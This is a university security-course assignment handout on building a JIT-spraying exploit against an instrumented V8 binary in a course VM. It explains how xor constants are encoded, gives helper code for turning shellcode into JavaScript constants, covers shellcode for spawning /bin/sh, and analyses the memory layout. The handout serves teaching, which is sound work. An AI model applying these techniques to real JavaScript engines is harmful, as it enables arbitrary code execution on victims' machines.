Project #4, JIT Spraying

Due: Monday, March 5th, 11:59 PM


The goal of this project is to craft a JIT-spraying exploit.

All work in this project must be done on the VirtualBox virtual machine provided on the course website; see below for information about this environment. Note: This is not the same VM we used for the previous projects!

The project VM includes a pp4 binary (installed in /home/user/bin) that contains a JavaScript JIT. The pp4 program takes a JavaScript filename as a command-line parameter, then compiles and runs the JavaScript code in that file. Whereas JavaScript running in a Web browser would have access to the DOM API for interacting with the outside world, JavaScript run by pp4 has access to just three functions beyond the JavaScript core. Two of them, exploit and hint, are described below.

Your task is to write a JavaScript file that will execute a JIT spray, call exploit with the address of some sprayed code, and then get a local shell.


Get the boxv8 virtual machine, BoxV8.ova (warning: 500 MB!). Again, this is not the same VM we used in the previous projects.

As usual, the VM has accounts root/root and user/user. You can expect to do all your work as user.

You can work locally on the VM, or you can SSH in. If you want to SSH in, run the following command as root on the VM: apt-get install openssh-server. The VM should already be configured to expose port 22 on port 1274 of the host, but you can confirm that this is the case by looking at the port forwarding dialog reachable in the VM’s network configuration tab. Once you have installed the SSH server on the VM, you should be able to SSH in using a command like “ssh user@localhost -p 1274”. You can also save yourself some typing by adding the following to your ~/.ssh/config file:

Host boxv8
    HostName localhost
    Port 1274
    User user

Once you have added that directive to your SSH config, you can SSH into the VM with just “ssh boxv8”.

Getting started

The JavaScript JIT powering the pp4 target is Google’s V8, which is used in Google Chrome. The JIT is lazy: when it sees a new function, it does not compile it until the first time the function is executed. Thus, it is not sufficient to create a function; you need to call it before V8 will JIT the code.

function payload(x) {
	var y = x ^
		/* JIT spray code */;
	return y;
}

Starting off the JIT spray code by xoring the variable x also seems to prevent V8 from optimizing the whole expression into a constant.

The first thing you should try doing is including some additional literal values in the spray function and looking at the code that is produced.

For example, try putting into the above code the following expression:

	var y = x ^
		0x2 ^
		0x4 ^
		0x8 ^
		0x10 ^
		0x20 ^
		0x40 ^
		0x55aa;

The pp4 target binary comes with an additional feature: when passed the -p command-line option, it prints out the JITted code. Note: This option is only designed to help you in the creation of your exploit. We will not be testing your code with this option.

If we run ~/bin/pp4 -p sploit.js on the above code, we see the sequence of xors:

0x22307c59    57  83f104         xor ecx,0x4
0x22307c5c    60  83f108         xor ecx,0x8
0x22307c5f    63  83f110         xor ecx,0x10
0x22307c62    66  83f120         xor ecx,0x20
0x22307c65    69  83f140         xor ecx,0x40
0x22307c68    72  81f180000000   xor ecx,0x80
0x22307c6e    78  81f154ab0000   xor ecx,0xab54

The first column is the address where the code was JITted (it changes on every run, so your values will likely differ from these), the second is the offset into the function, the third is the raw bytes that make up the instruction, and the fourth is the x86 instruction those bytes encode.

Notice that it has modified the value that is to be xored! This is a consequence of how V8 encodes integer values internally, as discussed in section. This has two implications you will need to keep in mind:

  1. The constants you include in your JavaScript payload will need to be different from the bytes you want to appear in the JITted code, to account for the change V8 will apply; and
  2. Some instructions will not be usable in some places in the output stream, because their binary representation will require an odd byte where V8 forces an even byte.
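The two implications above can be made concrete with a small helper. In the listing above, the source constant 0x2 shows up as xor ecx,0x4, which suggests that the emitted immediate is the source constant shifted left by one bit. The function name jsConstantFor is hypothetical, and the shift-by-one rule is an inference from the listing, so check it against your own -p output.

```javascript
// Given the 32-bit immediate we want to see in the JITted code, return the
// constant to write in the JavaScript source.
// Assumption (inferred from the -p listing): emitted = source << 1.
function jsConstantFor(emitted) {
  if (emitted & 1) {
    // The lowest bit of the emitted immediate is always 0, so an odd
    // lowest byte cannot be produced at this position.
    throw new Error("low bit must be 0: 0x" + emitted.toString(16));
  }
  return emitted >>> 1;
}

console.log("0x" + jsConstantFor(0x4).toString(16));    // prints 0x2
console.log("0x" + jsConstantFor(0xab54).toString(16)); // prints 0x55aa
```

Because x86 immediates are little-endian, the byte that must be even is the first byte of the immediate in memory.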

Also notice that V8 is using two different forms of xor instruction. For small values, it uses an instruction that takes a one-byte immediate value (in Intel notation, imm8). For large values, it uses an instruction that takes a four-byte immediate value (in Intel notation, imm32). You’re going to be using large values, so the second form is the only one that matters here.

There is one more restriction you will need to keep in mind. The second form, with imm32, is used only when the constant being xored is smaller than 0x40000000. If you try to xor an integer larger than 0x3fffffff, the generated code is not nearly as compact. Fortunately, that will not be an issue if you use cmp al as your chaining instruction as it has opcode 3c.
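As a rough way to check a constant before putting it in the payload, the sketch below classifies which xor form to expect. The function name xorForm is hypothetical. The imm8 cutoff is an inference: the listing shows an emitted 0x40 using the one-byte form and an emitted 0x80 using the four-byte form, which matches the sign-extended imm8 range on x86. Treat the result as a prediction to confirm with -p.

```javascript
// Predict which xor encoding V8 will pick for a non-negative integer
// constant written in the JavaScript source.
// Assumptions: emitted immediate = constant * 2; imm8 is used while the
// emitted value fits in a sign-extended byte (0x00..0x7f).
function xorForm(constant) {
  if (!Number.isInteger(constant) || constant < 0) {
    throw new Error("expected a non-negative integer");
  }
  if (constant > 0x3fffffff) {
    return "not compact"; // larger values do not get the compact xor forms
  }
  var emitted = constant * 2;
  return emitted <= 0x7f ? "imm8" : "imm32";
}

console.log(xorForm(0x20));       // prints imm8  (emitted 0x40)
console.log(xorForm(0x40));       // prints imm32 (emitted 0x80)
console.log(xorForm(0x40000000)); // prints not compact
```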

Infuriatingly, V8 here is using ecx as the accumulator register for the xors instead of eax, and it’s generating instructions that take two bytes in addition to the immediate, instead of the one-byte instructions for eax we considered in lecture. That’s okay; when you define your payload function using new Function (and invoke that function enough times to get it inlined) you will see xors that use eax.

For example, here is a version of the JavaScript above invoked through the function constructor:

var fstr = `
  var y = x ^
          0x1 ^
          0x2 ^
          0x4 ^
          0x8 ^
          0x10 ^
          0x20 ^
          0x40 ^
          0x55aa;
  return y`;

var f = new Function("x", fstr);

var i;
for (i = 0; i < /* SUFFICIENTLY MANY ITERATIONS */ ; i++) f(0);

With the placeholder comment replaced by a sufficiently large number to induce inlining, this produces assembly that looks like what we saw above, but with eax:

0x54688488    40  83f002         xor eax,0x2
0x5468848b    43  83f004         xor eax,0x4
0x5468848e    46  83f008         xor eax,0x8
0x54688491    49  83f010         xor eax,0x10
0x54688494    52  83f020         xor eax,0x20
0x54688497    55  83f040         xor eax,0x40
0x5468849a    58  3580000000     xor eax,0x80
0x5468849f    63  3554ab0000     xor eax,0xab54

Your most important deliverable is a JavaScript file called sploit.js. When ~/bin/pp4 sploit.js is run, the result should be a local shell:

user@boxv8:~/pp4$ ~/bin/pp4 sploit.js
$ echo hello
$ exit

To do that, you’re going to need to write some shell code. Take a look at Aleph One’s code from the reading. Essentially, you need to arrange for eax to have value 11, ebx to point to the string “/bin/sh”, ecx to point to the argv array and edx to point to the environ array. You can construct the string and the arrays on the stack. Unlike Aleph One, you don’t need to avoid zero bytes, making your job a little easier.

Finally, since the compiled code for a function is placed at a different random address on each run, you’re going to need to JIT a bunch of copies of your payload function. This is easiest if you include your payload function in your exploit JavaScript inside a string, then use new Function to create multiple functions with that code. (Note that if you use this strategy, you may need to call the lambda you get multiple times before V8 bothers to compile the code the way you want.) Try to make your exploit as reliable as possible, but it’s okay if pp4 crashes the first few times we try to run it.
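A minimal sketch of that strategy follows. The names spray, body, copies, and warmupCalls are hypothetical, and the numbers passed in the usage line are placeholders, not recommended values: how many copies and how many warm-up calls you need is something to find by experiment with -p. Adding a distinct comment to each copy is an assumption meant to keep V8 from treating identical source strings as one function; verify that it matters on your VM.

```javascript
// Create `copies` functions from the same payload body and call each one
// `warmupCalls` times so that V8 has a reason to compile it.
function spray(body, copies, warmupCalls) {
  var fns = [];
  for (var i = 0; i < copies; i++) {
    // Assumption: a unique comment makes each source string distinct.
    var f = new Function("x", "/* copy " + i + " */ " + body);
    for (var j = 0; j < warmupCalls; j++) {
      f(j);
    }
    fns.push(f); // keep a reference so the function stays reachable
  }
  return fns;
}

// Placeholder body: two constants that each emit 90 90 90 3c
// (three NOPs followed by the cmp al opcode) under the shift-by-one rule.
var body = "var y = x ^ 0x1e484848 ^ 0x1e484848; return y;";
var sprayed = spray(body, 4, 100); // placeholder counts
console.log(sprayed.length);       // prints 4
```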


You will submit the following files:

  1. README: Your README file should describe how your modified (or similar) script works, how your shell code works, and how your JIT spray works.

  2. GROUP: Your project ID and your partner’s (if you worked with one), in the same format as for previous projects

  3. shellcode.s: Shellcode (in the format of example.s) on which you will run your modified (or similar) script to produce your JavaScript.

  4. Your modified (or comparable) script that turns your shellcode.s into JavaScript.

  5. sploit.js: Your JavaScript file that obtains a shell when executed by pp4.

We should be able to run your exploits by running:

user@boxv8:~/pp4$ ~/bin/pp4 sploit.js

It may take a few attempts to work correctly due to the randomness, but try to make it as robust as you can (see below).

Developing and testing your exploit

Trying to write x86 instructions in binary by hand is needlessly painful. You should instead develop and test shellcode using assembly, then translate the binary, assembled version of that shellcode into constants suitable for including in a JavaScript exploit.

To assist in the creation of your exploit, we have provided a Bash script. It takes as an argument an assembly file (see example.s) and produces the encoding of the instructions it contains:

user@boxv8:~/pp4$ ./ example.s
b1 08	mov    cl,0x8
b0 64	mov    al,0x64
d3 e0	shl    eax,cl
b0 63	mov    al,0x63
d3 e0	shl    eax,cl
b0 62	mov    al,0x62
d3 e0	shl    eax,cl
b0 61	mov    al,0x61
50	push   eax

This script is already useful, because it shows you the bytes that the assembler produces when it assembles your .s file. For example, shifting the eax register left by the number in the cl register (which, remember, is a name for the least significant 8 bits of the ecx register) turns out to be the two-byte instruction with hex encoding d3 e0.

We strongly encourage you to modify the script, or write a wrapper for it in a scripting language you prefer (both Python and Perl are installed on your VM), to produce the sequence of constants to include in your JavaScript payload. This will be much easier to get right than doing it by hand! For example, Stephen Checkoway (who developed this project) wrote a version of the script that produces output of the form:

user@boxv8:~/pp4$ ./ example.s
		0x1e0458c8 ^ // mov    cl,0x8
		0x1e325848 ^ // mov    al,0x64
		0x1e7069c8 ^ // shl    eax,cl
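The three sample constants above are consistent with the following packing: pad the instruction with leading NOPs (0x90) to three bytes, append 0x3c (the cmp al opcode) as the fourth byte, read the four bytes as a little-endian 32-bit value, and shift right by one to undo V8's doubling. This is an inference from the sample output, not the actual script, and the function name encodeInstruction is hypothetical.

```javascript
// Pack one short instruction (1 to 3 bytes) into a JavaScript constant.
// Emitted imm32 layout, lowest address first:
//   [0x90 padding ...][instruction bytes][0x3c]
// 0x3c is cmp al, imm8, so it consumes the opcode byte of the next xor.
function encodeInstruction(bytes) {
  if (bytes.length < 1 || bytes.length > 3) {
    throw new Error("instruction must be 1 to 3 bytes");
  }
  var padded = [];
  while (padded.length + bytes.length < 3) {
    padded.push(0x90); // nop
  }
  padded = padded.concat(bytes, [0x3c]);
  if (padded[0] & 1) {
    throw new Error("first byte must be even"); // V8 forces the low bit to 0
  }
  // Assemble the little-endian 32-bit immediate, then halve it.
  var imm = (padded[0] | (padded[1] << 8) | (padded[2] << 16) | (padded[3] << 24)) >>> 0;
  return imm >>> 1;
}

console.log("0x" + encodeInstruction([0xb1, 0x08]).toString(16)); // prints 0x1e0458c8
console.log("0x" + encodeInstruction([0xb0, 0x64]).toString(16)); // prints 0x1e325848
console.log("0x" + encodeInstruction([0xd3, 0xe0]).toString(16)); // prints 0x1e7069c8
```

A wrapper script would feed each line of the assembler listing through a function like this and print the result followed by ^ and the mnemonic as a comment.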

If you’ve written what you think should work as shellcode, you can test it without getting V8 involved, by turning it into a binary and running it. That binary should give you a shell. To get you started, here is an example program that can be assembled (note the boilerplate at the beginning):

	.intel_syntax noprefix
	.globl	_start
_start:
	mov	eax, 4
	mov	ebx, 1
	lea	ecx, message
	mov	edx, 13
	int	0x80

	xor	ebx, ebx
	mov	eax, 1
	int	0x80
message:
	.ascii	"Hello, world\n"

Here is how to assemble and run it:

user@boxv8:~/pp4$ as foo.s -o foo.o
user@boxv8:~/pp4$ ld foo.o -o foo
user@boxv8:~/pp4$ ./foo
Hello, world

Note that the lines that start with a period contain assembler directives, and the lines that end with a colon are assembler labels. Your shellcode isn't being assembled by an assembler, so you will not be able to use any such directives in your shellcode. In particular this means that you can’t rely on having the string “/bin/sh” in data memory somewhere and will instead need to include instructions in your shellcode that place that string on the stack so you can later refer to it as an offset from the stack pointer, %esp.
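To place a string on the stack, it helps to know which 32-bit values to push and in what order. The sketch below computes them for any ASCII string; the function name pushWordsFor is hypothetical. It only computes values. If each constant carries three payload bytes plus a chaining opcode, a five-byte push imm32 will not fit, so you would build each value in a register first, as example.s does with mov al and shl, and then push the register.

```javascript
// Split a string (plus a NUL terminator, zero-padded to a multiple of 4
// bytes) into little-endian 32-bit words, listed in the order they must be
// pushed so that esp ends up pointing at the first character.
function pushWordsFor(str) {
  var bytes = [];
  for (var i = 0; i < str.length; i++) {
    bytes.push(str.charCodeAt(i) & 0xff);
  }
  bytes.push(0); // NUL terminator
  while (bytes.length % 4 !== 0) {
    bytes.push(0);
  }
  var words = [];
  // The stack grows downward, so the last four bytes are pushed first.
  for (var k = bytes.length - 4; k >= 0; k -= 4) {
    var w = (bytes[k] | (bytes[k + 1] << 8) | (bytes[k + 2] << 16) | (bytes[k + 3] << 24)) >>> 0;
    words.push(w);
  }
  return words;
}

var words = pushWordsFor("/bin/sh");
console.log(words.map(function (w) { return "0x" + w.toString(16); }).join(", "));
// prints 0x68732f, 0x6e69622f
```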

Instruction set and system call references

You will find a Linux system call reference useful. The system call you will need to invoke is execve.

You can, of course, get the current manuals directly from Intel. However, those cover x86-64, AMD’s 64-bit extension of x86, as well as 32-bit x86, so they are extremely long.

Yale’s operating systems class has a nice collection of 32-bit x86 resources, including cached copies of what Intel’s manuals looked like 10 years ago, when they were almost manageably short, and what they looked like 30 years ago, when they fit in a single printed book.

Another nice, more compact reference is maintained by MazeGen. That site includes compact listings of instructions alphabetically by mnemonic and by opcode. It also has excellent explanations of ModR/M byte encodings and of SIB byte encodings.

Making the exploit robust

To make the exploit robust, you’re going to want to take a few actions to reduce the amount of randomness you have to deal with.

First, you want to make each sprayed function fairly large, with most of it filled by a JITted NOP sled. For some reason, functions that are too large do not compile into the series of xors we want, so experiment using -p to get a sense of how many NOPs you can insert before you lose the chained xors.

Notice that the JITted output contains both unoptimized and optimized code. In the unoptimized code, each xor takes 13 bytes:

0x53887879   185  90             nop
0x5388787a   186  50             push eax
0x5388787b   187  b854ab0000     mov eax,0xab54
0x53887880   192  5a             pop edx
0x53887881   193  e87af3e0cd     call 0x21696c00             ;; code: BINARY_OP_IC UNINITIALIZED (id = 21)

In the optimized version, each xor is a single instruction like

0x53887e41    97  81f154ab0000   xor ecx,0xab54

What this means is that even discounting the fixed beginnings and endings of your JITted functions, most of your JITted code is not usable. Worse still, even if you jump into the middle of the optimized code, there’s still a chance you’ll land on an xor rather than in one of the NOP bytes. But that’s not all! The JIT also produces a lot of extra data that isn’t executable.

Linux exposes information about a process’s address space using the /proc file system. A process can get information about its own address space by reading /proc/self/maps. As an example, here’s what the cat process’s address space looks like.

user@boxv8:~/pp4$ cat /proc/self/maps 
08048000-08054000 r-xp 00000000 08:01 1775       /bin/cat
08054000-08055000 r--p 0000b000 08:01 1775       /bin/cat
08055000-08056000 rw-p 0000c000 08:01 1775       /bin/cat
08bfc000-08c1d000 rw-p 00000000 00:00 0          [heap]
b7406000-b7428000 rw-p 00000000 00:00 0 
b7428000-b75b1000 r--p 00000000 08:01 1626       /usr/lib/locale/locale-archive
b75b1000-b75b2000 rw-p 00000000 00:00 0 
b75b2000-b7759000 r-xp 00000000 08:01 16260      /lib/i386-linux-gnu/i686/cmov/
b7759000-b775b000 r--p 001a7000 08:01 16260      /lib/i386-linux-gnu/i686/cmov/
b775b000-b775c000 rw-p 001a9000 08:01 16260      /lib/i386-linux-gnu/i686/cmov/
b775c000-b775f000 rw-p 00000000 00:00 0 
b7765000-b7767000 rw-p 00000000 00:00 0 
b7767000-b7768000 r-xp 00000000 00:00 0          [vdso]
b7768000-b776a000 r--p 00000000 00:00 0          [vvar]
b776a000-b7789000 r-xp 00000000 08:01 3173       /lib/i386-linux-gnu/
b7789000-b778a000 r--p 0001f000 08:01 3173       /lib/i386-linux-gnu/
b778a000-b778b000 rw-p 00020000 08:01 3173       /lib/i386-linux-gnu/
bffb9000-bffda000 rw-p 00000000 00:00 0          [stack]

The first column gives the range of mapped addresses, the second column shows the permissions, and the final column shows the path of the file that’s mapped there. (See the proc man page for more details.) Notice that the process’s address space is laid out with the stack at the top, some libraries below that, then the heap and finally the binary itself.
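When you have many lines of this output to look through, a small parser can help pick out the executable regions. The sketch below splits one line into its fields; the function name parseMapsLine and the field names are hypothetical. The three middle columns (file offset, device, inode) are described in the proc man page.

```javascript
// Parse one line of /proc/<pid>/maps into an object, or return null if the
// line does not look like a mapping.
function parseMapsLine(line) {
  var re = /^([0-9a-f]+)-([0-9a-f]+)\s+([r-][w-][x-][ps])\s+([0-9a-f]+)\s+(\S+)\s+(\d+)\s*(.*)$/;
  var m = re.exec(line);
  if (!m) {
    return null;
  }
  return {
    start: parseInt(m[1], 16),  // first mapped address
    end: parseInt(m[2], 16),    // one past the last mapped address
    perms: m[3],                // e.g. "r-xp"
    offset: parseInt(m[4], 16), // offset into the mapped file
    dev: m[5],
    inode: Number(m[6]),
    path: m[7].trim()           // empty for anonymous mappings
  };
}

var sample = [
  "08048000-08054000 r-xp 00000000 08:01 1775       /bin/cat",
  "08bfc000-08c1d000 rw-p 00000000 00:00 0          [heap]",
  "b7406000-b7428000 rw-p 00000000 00:00 0 "
];
var executable = sample.map(parseMapsLine).filter(function (r) {
  return r !== null && r.perms.charAt(2) === "x";
});
console.log(executable.length); // prints 1
```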

When V8 allocates memory, it performs an mmap for (up to) 1 MB at a randomized address. See the OS::GetRandomMmapAddr() function for details. Essentially, it tries to allocate memory in the range 0x20000000 to 0x60000000.

Let’s take a look at what that looks like. The pp4 binary has another command-line flag, -m, which prints out the process’s address space just prior to jumping to the address specified by the exploit function.

Let’s take a look at that by running ~/bin/pp4 -m a.js where a.js contains just the exploit function.

user@boxv8:~/pp4$ cat a.js 
user@boxv8:~/pp4$ ~/bin/pp4 -m a.js 
2b500000-2b580000 rw-p 00000000 00:00 0 
2f100000-2f105000 rw-p 00000000 00:00 0 
2f105000-2f106000 ---p 00000000 00:00 0 
2f106000-2f14e000 rwxp 00000000 00:00 0 
2f14e000-2f180000 ---p 00000000 00:00 0 
36180000-36185000 rw-p 00000000 00:00 0 
36185000-36186000 ---p 00000000 00:00 0 
36186000-36187000 rwxp 00000000 00:00 0 
36187000-361b0000 ---p 00000000 00:00 0 
366d8000-366dc000 rw-p 00000000 00:00 0 
366dc000-366de000 ---p 00000000 00:00 0 
3b580000-3b5bd000 rw-p 00000000 00:00 0 
3b5bd000-3b600000 ---p 00000000 00:00 0 
3ed00000-3ed80000 rw-p 00000000 00:00 0 
40c00000-40c05000 rw-p 00000000 00:00 0 
40c05000-40c06000 ---p 00000000 00:00 0 
40c06000-40c7f000 rwxp 00000000 00:00 0 
40c7f000-40c80000 ---p 00000000 00:00 0 
41a80000-41a85000 rw-p 00000000 00:00 0 
41a85000-41a86000 ---p 00000000 00:00 0 
41a86000-41a87000 rwxp 00000000 00:00 0 
41a87000-41ab0000 ---p 00000000 00:00 0 
49b10000-49b11000 r-xp 00000000 00:00 0 
4d780000-4d785000 rw-p 00000000 00:00 0 
4d785000-4d786000 ---p 00000000 00:00 0 
4d786000-4d7ff000 rwxp 00000000 00:00 0 
4d7ff000-4d800000 ---p 00000000 00:00 0 
4f3b6000-4f7b6000 ---p 00000000 00:00 0 
55100000-55106000 rw-p 00000000 00:00 0 
55106000-55180000 ---p 00000000 00:00 0 
5ba80000-5ba85000 rw-p 00000000 00:00 0 
5ba85000-5ba86000 ---p 00000000 00:00 0 
5ba86000-5ba87000 rwxp 00000000 00:00 0 
5ba87000-5bab0000 ---p 00000000 00:00 0 
5ec80000-5ed00000 rw-p 00000000 00:00 0 
5f080000-5f100000 rw-p 00000000 00:00 0 
80036000-80b3c000 r-xp 00000000 08:01 77         /home/user/bin/pp4
80b3d000-80b66000 r--p 00b06000 08:01 77         /home/user/bin/pp4
80b66000-80b6a000 rw-p 00b2f000 08:01 77         /home/user/bin/pp4
80b6a000-80b75000 rw-p 00000000 00:00 0 
81e5f000-81ec8000 rw-p 00000000 00:00 0          [heap]
b60e7000-b60e8000 ---p 00000000 00:00 0 
b60e8000-b73d7000 rw-p 00000000 00:00 0          [stack:2123]
b73d7000-b757e000 r-xp 00000000 08:01 16260      /lib/i386-linux-gnu/i686/cmov/
b757e000-b7580000 r--p 001a7000 08:01 16260      /lib/i386-linux-gnu/i686/cmov/
b7580000-b7581000 rw-p 001a9000 08:01 16260      /lib/i386-linux-gnu/i686/cmov/
b7581000-b7584000 rw-p 00000000 00:00 0 
b7584000-b75a0000 r-xp 00000000 08:01 913        /lib/i386-linux-gnu/
b75a0000-b75a1000 rw-p 0001b000 08:01 913        /lib/i386-linux-gnu/
b75a1000-b75e5000 r-xp 00000000 08:01 16264      /lib/i386-linux-gnu/i686/cmov/
b75e5000-b75e6000 r--p 00043000 08:01 16264      /lib/i386-linux-gnu/i686/cmov/
b75e6000-b75e7000 rw-p 00044000 08:01 16264      /lib/i386-linux-gnu/i686/cmov/
b75e7000-b76cd000 r-xp 00000000 08:01 8955       /usr/lib/i386-linux-gnu/
b76cd000-b76d1000 r--p 000e6000 08:01 8955       /usr/lib/i386-linux-gnu/
b76d1000-b76d2000 rw-p 000ea000 08:01 8955       /usr/lib/i386-linux-gnu/
b76d2000-b76da000 rw-p 00000000 00:00 0 
b76da000-b76e1000 r-xp 00000000 08:01 16275      /lib/i386-linux-gnu/i686/cmov/
b76e1000-b76e2000 r--p 00006000 08:01 16275      /lib/i386-linux-gnu/i686/cmov/
b76e2000-b76e3000 rw-p 00007000 08:01 16275      /lib/i386-linux-gnu/i686/cmov/
b76e3000-b76fb000 r-xp 00000000 08:01 16256      /lib/i386-linux-gnu/i686/cmov/
b76fb000-b76fc000 r--p 00017000 08:01 16256      /lib/i386-linux-gnu/i686/cmov/
b76fc000-b76fd000 rw-p 00018000 08:01 16256      /lib/i386-linux-gnu/i686/cmov/
b76fd000-b76ff000 rw-p 00000000 00:00 0 
b7704000-b7707000 rw-p 00000000 00:00 0 
b7707000-b7708000 r-xp 00000000 00:00 0          [vdso]
b7708000-b770a000 r--p 00000000 00:00 0          [vvar]
b770a000-b7729000 r-xp 00000000 08:01 3173       /lib/i386-linux-gnu/
b7729000-b772a000 r--p 0001f000 08:01 3173       /lib/i386-linux-gnu/
b772a000-b772b000 rw-p 00020000 08:01 3173       /lib/i386-linux-gnu/
bfcb1000-bfcd2000 rw-p 00000000 00:00 0          [stack]
Segmentation fault

There’s a lot to see there and it’s easy to miss what’s important. Notice that a lot of the heap memory actually comes in 512 KB-aligned chunks. E.g.,

2b500000-2b580000 rw-p 00000000 00:00 0 

Even more interesting are the executable regions. Every piece of JITted code comes in a chunk that looks like this.

2f100000-2f105000 rw-p 00000000 00:00 0 
2f105000-2f106000 ---p 00000000 00:00 0 
2f106000-2f14e000 rwxp 00000000 00:00 0 
2f14e000-2f180000 ---p 00000000 00:00 0 

Each chunk starts with 0x5000 bytes of nonexecutable data, followed by one guard page (which cannot be read, written, or executed), then the actual executable code, and finally the remainder of the chunk, which is reserved but not accessible.

You’re going to be writing a whole lot of data so it’s going to look more like this, with just a single guard page left at the end of a chunk:

29100000-29105000 rw-p 00000000 00:00 0 
29105000-29106000 ---p 00000000 00:00 0 
29106000-2917f000 rwxp 00000000 00:00 0 
2917f000-29180000 ---p 00000000 00:00 0 
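The offsets in these listings can be written down as a small calculation. The sketch below assumes the layout shown above holds for every 512 KB chunk: 0x5000 bytes of data, one 0x1000-byte guard page, then code up to the final guard page. The function name chunkLayout and its field names are hypothetical, and smaller chunks, such as the 0x30000-byte ones in the -m output, end earlier than this computes.

```javascript
var CHUNK_SIZE = 0x80000; // 512 KB, as in 29100000-29180000
var DATA_SIZE = 0x5000;   // nonexecutable data at the start of the chunk
var PAGE_SIZE = 0x1000;   // size of each guard page

// Given the base address of a full chunk, compute where its parts lie.
function chunkLayout(base) {
  return {
    dataStart: base,
    guardStart: base + DATA_SIZE,
    codeStart: base + DATA_SIZE + PAGE_SIZE,
    // Upper bound on the code region when the chunk is completely used.
    codeEndMax: base + CHUNK_SIZE - PAGE_SIZE,
    chunkEnd: base + CHUNK_SIZE
  };
}

var layout = chunkLayout(0x29100000);
console.log(layout.codeStart.toString(16));  // prints 29106000
console.log(layout.codeEndMax.toString(16)); // prints 2917f000
```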

In a real JIT spraying attack, you would need to guess the location of a 512 KB executable chunk; typically, attackers will JIT enough functions that some address range in memory will contain a chunk with high probability, based on quirks in the allocation policy under memory constraints.

For this project, we’ll save you having to do this. Instead, you can call the function hint. The first time this function is called, it will return an integer representing the base address of one V8 executable chunk, chosen at random. (Assuming that there are at least three JIT executable mappings, which should always be the case.) On subsequent calls it will return zero.

If you want to have a clearer sense of how the values returned by hint relate to the memory map you get by running the pp4 binary with the -m flag, you can run the pp4 binary with the -a flag. When run this way, pp4 changes the behavior of the hint function so that it returns an array of all JIT executable mappings, rather than just one entry of that array chosen at random. Note that we will not be running the pp4 binary with the -a flag when we test your exploit, so you should code your exploit to work with the default rather than the -a behavior of hint.
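Because hint returns a useful value only on its first call, it is worth reading it exactly once and keeping the result. The sketch below takes the hint function as a parameter so that it can be tried outside pp4 with a stand-in; the name readHintOnce is hypothetical, and it handles only the default behavior, not the array returned under -a.

```javascript
// Call the supplied hint function once and fail loudly if it returns zero,
// which is what happens on any call after the first.
function readHintOnce(hintFn) {
  var value = hintFn();
  if (!value) {
    throw new Error("hint returned zero; was it already called?");
  }
  return value;
}

// Stand-in for pp4's hint, for experimenting outside the VM: returns an
// address on the first call and zero afterwards.
var fakeCalls = 0;
function fakeHint() {
  fakeCalls++;
  return fakeCalls === 1 ? 0x2f100000 : 0;
}

var base = readHintOnce(fakeHint);
console.log(base.toString(16)); // prints 2f100000
```

Inside pp4 you would pass the real hint function instead of the stand-in and derive the address you hand to exploit from the returned value.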


This project is based on Project 3 from Johns Hopkins’s CS 460, Software Vulnerability Analysis. Thanks to Stephen Checkoway.
